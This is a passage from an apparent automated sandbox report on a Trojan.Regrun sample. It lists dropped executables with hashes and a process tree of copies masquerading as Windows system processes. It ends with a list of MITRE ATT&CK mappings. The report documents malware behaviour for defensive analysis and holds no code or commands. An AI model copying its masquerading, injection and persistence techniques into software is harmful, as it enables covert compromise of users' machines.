"2e46a1bd18f9e8441b0469172709cabc06ebebd089c582988beab8f8a50d50a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67E3CEFD.bin", "file_size": 163903, "sha256": "10ed25b939734bef4114fe28abb0167ccf8be75bf7d0bbc5b3f400f5e6367c8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67E3CC76.bin", "file_size": 163903, "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3D138.bin", "file_size": 163903, "sha256": "d465297efaea5cfaf771fe6c34caf02691b8d4ee421f239d797c447fbb33dab4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3CC79.bin", "file_size": 163903, "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67E3D133.bin", "file_size": 163903, "sha256": "82b75a242b17cfb2c72035438a3d53517cc23ef2b9a985011c5ec44da739b38d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005912", "name": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe", "normalized_path": "C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe", "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00005904", "parentuid": "00000000-00005912", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00006100", "parentuid": "00000000-00005904", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00006036", "parentuid": "00000000-00005904", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00002312", "parentuid": "00000000-00005904", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00006024", "parentuid": "00000000-00005904", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00001748", "parentuid": "00000000-00006024", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00001856", "parentuid": "00000000-00006024", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00004172", "parentuid": "00000000-00006024", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00003636", "parentuid": "00000000-00006024", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00001084", "parentuid": "00000000-00006024", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00000884", "parentuid": "00000000-00006024", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00002484", "parentuid": "00000000-00006024", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00003524", "parentuid": "00000000-00005904", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00003476", "parentuid": "00000000-00005904", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00003880", "parentuid": "00000000-00003476", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00001988", "parentuid": "00000000-00003476", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00003276", "parentuid": "00000000-00003476", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00003868", "parentuid": "00000000-00003476", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00003828", "parentuid": "00000000-00003476", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00003532", "parentuid": "00000000-00003476", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00001120", "parentuid": "00000000-00003476", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00003728", "parentuid": "00000000-00003476", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "10ed25b939734bef4114fe28abb0167ccf8be75bf7d0bbc5b3f400f5e6367c8b"}, {"uid": "00000000-00004480", "parentuid": "00000000-00003728", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "10ed25b939734bef4114fe28abb0167ccf8be75bf7d0bbc5b3f400f5e6367c8b"}, {"uid": "00000000-00002156", "parentuid": "00000000-00003476", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00003904", "parentuid": "00000000-00005904", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00001524", "parentuid": "00000000-00003904", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00003576", "parentuid": "00000000-00003904", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00001188", "parentuid": "00000000-00003904", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00004608", "parentuid": "00000000-00003904", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00004616", "parentuid": "00000000-00003904", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00003180", "parentuid": "00000000-00003904", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00004572", "parentuid": "00000000-00003904", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00004200", "parentuid": "00000000-00005912", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00006120", "parentuid": "00000000-00004200", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00004416", "parentuid": "00000000-00004200", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00004420", "parentuid": "00000000-00004200", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00002684", "parentuid": "00000000-00004200", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00003548", "parentuid": "00000000-00004200", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00003652", "parentuid": "00000000-00004200", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00003856", "parentuid": "00000000-00004200", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00006068", "parentuid": "00000000-00005912", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00003572", "parentuid": "00000000-00006068", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00004116", "parentuid": "00000000-00006068", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00004508", "parentuid": "00000000-00006068", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00003048", "parentuid": "00000000-00006068", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00003232", "parentuid": "00000000-00006068", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00003700", "parentuid": "00000000-00006068", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00003220", "parentuid": "00000000-00006068", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00004424", "parentuid": "00000000-00005912", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00006040", "parentuid": "00000000-00005912", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00001176", "parentuid": "00000000-00006040", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "e0f8fb7ea8c7a52bc304a0d742be67bbd2c4574c097834adf4ff01a66ea09b89"}, {"uid": "00000000-00004112", "parentuid": "00000000-00006040", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9e0b09d74b6ef434ed7895a9ade0c1cd3b5d032cae537cc3fa45fe196baea44"}, {"uid": "00000000-00003676", "parentuid": "00000000-00006040", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "325450aef3ed5ae31e47b4ac032c81e69146fb76270a33105122c0e2624cd86d"}, {"uid": "00000000-00002356", "parentuid": "00000000-00006040", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "2b24a948f2e244964f1bf2931653df4ea1a6fc09bb7018bae32b6942439ea5a9"}, {"uid": "00000000-00002244", "parentuid": "00000000-00006040", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6f5391f294ce4d82e9bfd71e20460ce6e83b26ed586a7a8812fea86c0afa20a5"}, {"uid": "00000000-00002032", "parentuid": "00000000-00006040", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00004580", "parentuid": "00000000-00006040", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00000244", "parentuid": "00000000-00006040", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "10ed25b939734bef4114fe28abb0167ccf8be75bf7d0bbc5b3f400f5e6367c8b"}, {"uid": "00000000-00000800", "parentuid": "00000000-00006040", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00004816", "parentuid": "00000000-00006040", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "c11cc57a0fdc1030676f0eb0cf56727d63b6fc0173cfd36324a909599333a010"}, {"uid": "00000000-00002656", "parentuid": "00000000-00005912", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8dd11bd2790627e7d7802866f68255d8d3f5ca50e258e838bf2c3fb7c9451f7b"}, {"uid": "00000000-00003816", "parentuid": "00000000-00005912", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "58507e9b2ea5da8a6162eb215911ab492de870986f4806fc48c6cb2a8c5b601b"}, {"uid": "00000000-00004456", "parentuid": "00000000-00005912", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "10ed25b939734bef4114fe28abb0167ccf8be75bf7d0bbc5b3f400f5e6367c8b"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": 